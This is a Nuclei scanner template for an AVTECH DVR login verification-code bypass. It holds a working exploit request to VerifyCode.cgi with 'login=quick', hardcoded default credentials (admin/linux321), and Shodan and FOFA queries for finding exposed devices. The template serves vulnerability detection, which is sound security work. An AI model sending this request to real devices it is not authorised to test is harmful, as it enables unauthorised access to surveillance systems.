nuclei-templates/http/vulnerabilities/avtech/avtech-verification-bypass....

39 lines
1.1 KiB
YAML

id: avtech-verification-bypass
info:
name: AVTECH DVR - Login Verification Code Bypass
author: ritikchaddha
severity: low
description: |
AVTECH DVR products are vulnerable to verification code bypass just by entering the "login=quick" parameter to bypass verification code.
metadata:
verified: true
max-request: 1
shodan-query: title:"login" product:"Avtech"
fofa-query: app="AVTECH-视频监控"
tags: avtech,verify,bypass,iot
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/nobody/VerifyCode.cgi?account={{base64(username + ':' + password)}}&login=quick"
attack: pitchfork
payloads:
username:
- admin
password:
- linux321
matchers-condition: and
matchers:
- type: regex
regex:
- "^0.*\nOK.*"
- type: dsl
dsl:
- status_code == 200
- len(body) == 5
condition: and
# digest: 4b0a00483046022100f66dfc80ac1a45755069a731adee572ccf8c2a212a01cf620d518d45127b16f20221009c4b0ba05a989d4e3436f50fedca757ba584308e5fb2a9d4dcf7f810a6111861:922c64590222798bb761d5b6d8e72950